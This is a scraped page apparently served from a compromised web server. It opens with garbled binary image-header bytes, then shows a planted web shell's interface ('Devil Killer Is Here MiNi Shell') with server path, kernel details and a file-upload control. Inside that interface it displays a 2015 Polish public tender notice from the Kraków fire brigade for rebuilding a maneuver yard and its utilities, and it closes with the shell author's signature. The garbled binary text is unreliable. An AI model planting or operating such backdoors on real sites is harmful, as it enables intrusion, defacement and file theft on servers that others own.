JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150826/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150826/220214-N-2015.html

<p class="kh_header"><b>Kraków: Przebudowa placu manewrowego wraz z instalacjami wewnętrznymi Komendy Miejskiej Państwowej Straży Pożarnej w Krakowie</b><br>
<b>Numer ogłoszenia: 220214 - 2015; data zamieszczenia: 26.08.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Komenda Miejska Państwowej Straży Pożarnej w Krakowie , ul. Westerplatte 19, 31-033 Kraków, woj. małopolskie, tel. 012 616 83 00, faks 012 616 83 09.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.psp.krakow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa placu manewrowego wraz z instalacjami wewnętrznymi Komendy Miejskiej Państwowej Straży Pożarnej w Krakowie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest realizacja zadania pn.: Przebudowa placu manewrowego wraz 
z przebudową instalacji wewnętrznych Komendy Miejskiej Państwowej Straży Pożarnej (instalacja kanalizacyjna, gazowa, cieplna, elektroenergetyczna) oraz likwidacja kolidujących instalacji wod-kan., gazowej i elektroenergetycznej - przy ulicy Westerplatte 19 w Krakowie, działka nr 100, obręb 2 Śródmieście zgodnie z projektem budowlanym objętym prawomocną decyzją Prezydenta Miasta Krakowa o pozwoleniu na budowę Nr 2322/2012 z dnia 26 października 2012 roku.
Prace będą prowadzone na obiekcie zabytkowym na podstawie Pozwolenia Nr 788/12 z dnia 23 sierpnia 2012 r. Małopolskiego Wojewódzkiego Konserwatora Zabytków zmienionego Decyzją Nr 896/12 z dnia 25 września 2012 r. oraz Decyzją Nr 189/15 z dnia 18.06.2015 r.  
Przedmiot zamówienia należy zrealizować zgodnie z:
	dokumentacją projektową:
1B Zagospodarowanie terenu - (zał. Nr 7.1 do SIWZ);
2B Drogi i ukształtowanie terenu - (zał. Nr 7.2 do SIWZ);
3B Kanalizacja sanitarna i deszczowa - (zał. Nr 7.3 do SIWZ);
4B Instalacja gazowa - (zał. Nr 7.4 do SIWZ);
5B Sieć C.O. - (zał. Nr 7.5 do SIWZ);
6B Sieć elektroenergetyczna - (zał. Nr 7.6 do SIWZ);
7B Dokumentacja geotechniczna - (zał. Nr 7.7 do SIWZ);
Decyzją pozwolenia na budowę - (zał. Nr 7.8 do SIWZ);
Pozwoleniem MWKZ wraz z Decyzjami zmieniającymi - (zał. Nr 7.9 do SIWZ);
	Specyfikacjami Technicznymi Wykonania i Odbioru Robót Budowlanych:
Drogi i ukształtowanie terenu - (zał. Nr 8.1 do SIWZ);
Kanalizacja i instalacja gazowa - (zał. Nr 8.2 do SIWZ);
Sieć C.O. - (zał. Nr 8.3 do SIWZ);
Sieć elektroenergetyczna - (zał. Nr 8.4 do SIWZ);
Przedmiarami robót:
Drogi i ukształtowanie terenu - (zał. Nr 9.1 do SIWZ);
Kanalizacja sanitarna i deszczowa - (zał. Nr 9.2 do SIWZ);
Sieć gazowa - (zał. Nr 9.3 do SIWZ);
Sieć C.O. wysokich parametrów - (zał. Nr 9.4 do SIWZ);
Sieć C.O. niskich parametrów - (zał. Nr 9.5 do SIWZ);
Kabel energetyczny - (zał. Nr 9.6 do SIWZ);
	Niniejszą Specyfikacją Istotnych Warunków Zamówienia;
	Uzgodnieniami, decyzjami administracyjnymi, wizją w terenie.
Wyżej wymienione dokumenty mają być traktowane jako wzajemnie uzupełniające się.
Szczegółowy zakres z podziałem na poszczególne etapy, czasookresy (z wyodrębnieniem zakresów powierzonych ewentualnym podwykonawcom) oraz kwoty wynagrodzenia netto i brutto należne Wykonawcy za wykonane i odebrane etapy określał będzie Harmonogram Rzeczowo-Finansowy Robót - zwany dalej Harmonogramem realizacji przedmiotu umowy, który będzie stanowił załącznik 
nr 1 do umowy.
Harmonogram zostanie przygotowany (wypełniony) przez wybranego Wykonawcę przed podpisaniem umowy w formie elektronicznej w postaci pliku Excel (xls), na podstawie złożonej oferty (kosztorysy ofertowe) oraz będzie podlegał weryfikacji i zatwierdzaniu przez Zamawiającego.
Harmonogram musi uwzględniać następujące etapy realizacji i założenia główne:
	ETAP I: Kanalizacja sanitarna i deszczowa;
	ETAP II: Instalacja gazowa, sieci C.O. wysokich i niskich parametrów, sieć elektroenergetyczna;
	ETAP III: Drogi i ukształtowanie terenu;
Zamawiający informuje, iż płatności z tytułu realizowanego  zamówienia będą dokonywane 
w następujących okresach i kwotach:
w roku 2015 do kwoty 483 570,00 złotych brutto,
w roku 2016 do kwoty 975 390,00 złotych brutto,
w roku 2017 pozostała cześć wynagrodzenia z tytułu realizacji zamówienia.
	Wyznaczenie maksymalnej kwoty płatności w danym roku oznacza, iż Wykonawca może wykonać prace o większym zaangażowaniu, lecz płatność za te prace nastąpi dopiero w roku następnym.
Etapy/części, które zostaną uwzględnione w Harmonogramie będą podlegać odbiorom częściowym wraz 
z dostarczeniem dokumentów niezbędnych do dokonania tych odbiorów.
Zakres prac i czynności obejmuje również:
	opracowanie i przekazanie Zamawiającemu kompletnej dokumentacji powykonawczej pozwalającej na uzyskanie pozwolenia na użytkowanie wzniesionego przez Wykonawcę obiektu, tj.:
inwentaryzacji geodezyjnej;
protokołów i sprawdzeń branżowych;
kart gwarancyjnych;
kompletu atestów i dopuszczeń; itp.
organizację i zabezpieczenie placu budowy:
Wykonawca będzie korzystał z tego samego wjazdu na placu budowy, którym będą poruszać się służby Jednostki Ratowniczo-Gaśniczej Nr 1. Wjazd musi być utrzymywany przez Wykonawcę na bieżąco w pełnej przejezdności i czystości,
Zamawiający informuje, że w budynku koszarowo - biurowym Jednostki Ratowniczo-Gaśniczej Nr 1 przy ul. Westerplatte 19 pełnią całodobową służbę strażacy i Wykonawca w porozumieniu 
z Zamawiającym zobowiązany będzie własnym staraniem i kosztem do takiej organizacji prac budowlanych, aby umożliwić działalność ratowniczo-gaśniczą Jednostki;
Wykonawca ma obowiązek zgłaszać uprawnionemu przedstawicielowi Zamawiającego wszelkie zamierzenia wykonywania prac, w celu skoordynowania działań Jednostki oraz prowadzić pisemny wykaz pracowników obecnych każdego dnia na placu budowy,
Wykonawca ponosił będzie odpowiedzialność za ewentualne uszkodzenia materiałów, urządzeń 
i sprzętu zamontowanego w budynkach koszarowych JRG Nr 1 powstałych na skutek niewłaściwego prowadzenia prac lub niewłaściwego działania pracowników Wykonawcy,
na plac budowy mogą być dostarczane materiały budowlane, które będą w danym dniu wbudowane, pozostałe materiały budowlane muszą być składowane i przechowywane 
u Wykonawcy,
Wykonawca w trakcie realizacji przedmiotu zamówienia musi uwzględnić również trudności związane z przenikaniem się robót wykonywanych przez innych Wykonawców (prace elewacyjne 
i termoizolacyjne) na budynkach PSP zlokalizowanych wokół placu manewrowego,
media: prąd - podłączenie do istniejącego złącza, woda - wykonanie przyłącza przez Wykonawcę (sieć na terenie budowy). Zużycie mediów rozliczane będzie na podstawie faktur wystawionych przez Zamawiającego - prąd, woda - (refaktura dla Wykonawcy od PSP); 
Wykonawca zobowiązany jest uwzględnić w trakcie realizacji robót powyższe informacje i fakty 
z uwagi na funkcjonujący obiekt Jednostki Ratowniczo-Gaśniczej Nr 1 oraz w celu bezpiecznego 
i sprawnego wykonywania prac;
odtworzenie placu manewrowego po wykonaniu prac ziemnych: Wykonawca z uwagi na etapowanie prac po wykonaniu robót związanych z przebudową kanalizacji sanitarnej, deszczowej, 
a następnie przebudową instalacji gazowej, sieci C.O. i elektroenergetycznej musi odtworzyć swoim staraniem i na swój koszt plac manewrowy do stanu pozwalającego na bezpiecznie i prawidłowe funkcjonowanie Jednostki w ramach wykonywanej działalności ratowniczo-gaśniczej do czasu rozpoczęcia kolejnych etapów prac.
Kody CPV: 45.11.12.00-0 Roboty w zakresie przygotowania terenu pod budowę i roboty ziemne, 45.23.13.00-8 Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków, 45.23.12.20-3 Roboty budowlane w zakresie gazociągów, 45.23.21.50-8 - Roboty w zakresie rurociągów do przesyłu wody, 45.23.32.20-7 Roboty budowlane w zakresie układania chodników 
i asfaltowania, 45.31.00.00-3 Roboty instalacyjne elektryczne.
Dodatkowe wymagania i informacje dotyczące przedmiotu zamówienia:
Przedmiot zamówienia należy wykonać zgodnie z dokumentacja projektową oraz zgodnie z obowiązującymi przepisami, normami i instrukcjami producentów stosowanych urządzeń i materiałów, pod nadzorem przedstawiciela Zamawiającego - Inspektora Nadzoru Inwestorskiego oraz Inspektora Nadzoru Archeologicznego.
Z wyprzedzeniem wymaganym przepisami należy zawiadomić właściwy organ nadzoru budowlanego i nadzoru archeologicznego o rozpoczęciu i zakończeniu robót objętych zamówieniem.
Należy wykonać geodezyjne tyczenie tras sieci i instalacji objętych przedmiotem zamówienia. Przed rozpoczęciem układania rur sprawdzić geodezyjnie niweletę podsypki na dnie wykopu.
W trakcie wykonywania wykopów należy zwracać szczególną uwagę na ewentualne niezinwentaryzowane uzbrojenie podziemne. W miejscach skrzyżowań z istniejącym uzbrojeniem podziemnym należy wykonać wykopy kontrolne dla dokładnego ustalenia położenia tego uzbrojenia. Roboty ziemne i montażowe wykonywać ręcznie ze szczególną ostrożnością.
W przypadku skrzyżowania się wykonywanych kanalizacji i sieci  z istniejącym podziemnym uzbrojeniem technicznym, przewody tego uzbrojenia zabezpieczyć przez podwieszenie lub w inny sposób wymagany przepisami i wskazany przez użytkownika/właściciela uzbrojenia.
Po zakończeniu robót należy uporządkować i odtworzyć pierwotny stan terenu na obszarze objętym pracami.
Elementy, materiały zastosowane w czasie realizacji przedmiotu zmówienia muszą posiadać oznaczenia identyfikujące, np. producent, typ wyrobu, średnica, materiał, ciśnienie nominalne, itp.
Atesty na proponowane do wbudowywania materiały, certyfikaty, aprobaty i inne wymagane dokumenty należy przedłożyć Inspektorowi Nadzoru Inwestorskiego przed rozpoczęciem robót, celem ich akceptacji..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>V</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających:</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li>Zamawiający przewiduje, że w okresie 3 lat od zawarcia umowy na wykonanie niniejszego zamówienia (zamówienia podstawowego) wybranemu wykonawcy mogą zostać udzielone zamówienia uzupełniające, o których mowa w art. 67 ust. 1 pkt 6 ustawy PZP, dotyczące przedmiotu zamówienia podstawowego, stanowiące nie więcej niż 30% wartości niniejszego zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.11.12.00-0, 45.23.13.00-8, 45.23.12.20-3, 45.23.21.50-8, 45.23.32.20-7, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.03.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Składając ofertę, Wykonawca zobowiązany jest w terminie do dnia 10 września 2015 r.  do godz. 11.00 wnieść wadium przetargowe - siedziba PSP.
Kwota wadium wynosi 40.000,00 zł (słownie: czterdzieści tysięcy złotych 00/100) i musi być wniesiona w złotych polskich.
Wadium musi obejmować okres związania ofertą, tj. od dnia, w którym upływa termin składania ofert na okres 30 dni.
Wadium przetargowe może być wniesione w jednej lub kilku następujących formach:
w pieniądzu - wpłaca się przelewem na rachunek Zamawiającego: Bank PKO S.A., numer rachunku: 25 1240 4722 1111 0000 4854 5594 - z dopiskiem Wpłata wadium - plac manewrowy w taki sposób, aby przed upływem terminu składania ofert wadium znajdowało się na w/w rachunku;
poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
w gwarancjach bankowych;
w gwarancjach ubezpieczeniowych;
poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy 
 z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.);
Oznacza to, że w terminie wniesienia wadium, w siedzibie Zamawiającego (Budynek Komendy Miejskiej Państwowej Straży Pożarnej w Krakowie, ul. Westerplatte 19, 31-033 Kraków (Dziennik Podawczy - parter) muszą zostać złożone za potwierdzeniem przyjęcia oryginały dokumentów poświadczające wniesienie wadium formach określonych w ppkt 11.4.2.-11.4.5. lub załączone do ofert (tj. w kopercie z ofertą). 
Wadium wnoszone w formie gwarancji i poręczeń musi spełniać następujące wymogi:
być wystawione na: Komendę Miejską Państwowej Straży Pożarnej w Krakowie 
ul. Westerplatte 19, 31-033 Kraków;
zawierać w swej treści oświadczenie gwaranta (poręczyciela), w którym zobowiązuje się on do bezwarunkowej wypłaty kwoty wadium na pierwsze żądanie Zamawiającego zawierające oświadczenie, iż zaszła jedna z przesłanek wymienionych w art. 46 ust. 4a i ust. 5 ustawy Pzp;
w przypadku, gdy Wykonawcy wspólnie ubiegają się o udzielenie zamówienia - obejmować zobowiązanie gwaranta (poręczyciela) z tytułu związanych z postępowaniem o udzielenie zamówienia działań lub zaniechań opisanych art. 46 ust. 4a i ust. 5 ustawy Pzp każdego z tych wykonawców;
UWAGA !
Wykonawca winien zamieścić w ofercie kopię dokumentu - potwierdzenia wniesienia wadium - dla celów przyspieszenia procesu badania ofert.
Zwrot wadium nastąpi na zasadach określonych w art. 46 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W postępowaniu mogą wziąć udział Wykonawcy, którzy spełniają warunek udziału w postępowaniu dotyczący braku podstaw do wykluczenia z postępowania o udzielenie zamówienia publicznego 
w okolicznościach, o których mowa w art. 24 ust. 1 ustawy Pzp.
Ocena spełniania warunków udziału w postępowaniu dokonywana będzie w formule spełnia - nie spełnia, w oparciu o dokumenty załączone do oferty, a których wykaz zawiera ust. 7 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>legitymują się wykonaniem minimum 2 (dwóch) zamówień obejmujących roboty budowlane polegające na budowie, przebudowie lub remoncie placów, parkingów, ulic na obiektach zabytkowych o wartości pojedynczego zamówienia minimum 1,5 miliona złotych brutto.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia, tj.:
dysponują minimum jednym pracownikiem lub osobami współpracującymi posiadającymi uprawnienia budowlane do kierowania i nadzorowania robót budowlanych w następujących specjalnościach:
kierownika budowy posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej w zakresie dróg, posiadającego wykształcenie średnie lub wyższe oraz co najmniej trzyletnią praktykę zawodową i doświadczenie w kierowaniu co najmniej dwoma robotami budowlanymi w zakresie odpowiadającym posiadanym uprawnieniom, a także posiadającego stosowne uprawnienia konserwatorskie do prowadzenia prac budowlanych w obiektach wpisanych do rejestru zabytków bądź legitymującego się co najmniej dwuletnią praktyką zawodową przy prowadzeniu prac budowlanych w obiektach zabytkowych oraz posiadającego udokumentowane doświadczenie w realizacji co najmniej dwóch robót budowlanych przy remontach budynków wpisanych do rejestru zabytków;
instalacyjnej w zakresie instalacji sieci wod-kan - kierownik robót;
instalacyjnej w zakresie instalacji gazowych i sieci C.O - kierownik robót.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - okres gwarancji - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.psp.krakow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Komenda Miejska Państwowej Straży Pożarnej w Krakowie, ul. Westerplatte 19, 31-033 Kraków, II piętro, pokój 40 lub 41..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 10.09.2015 godzina 11:00, miejsce: Komenda Miejska Państwowej Straży Pożarnej w Krakowie, ul. Westerplatte 19, 31-033 Kraków (Dziennik Podawczy - parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com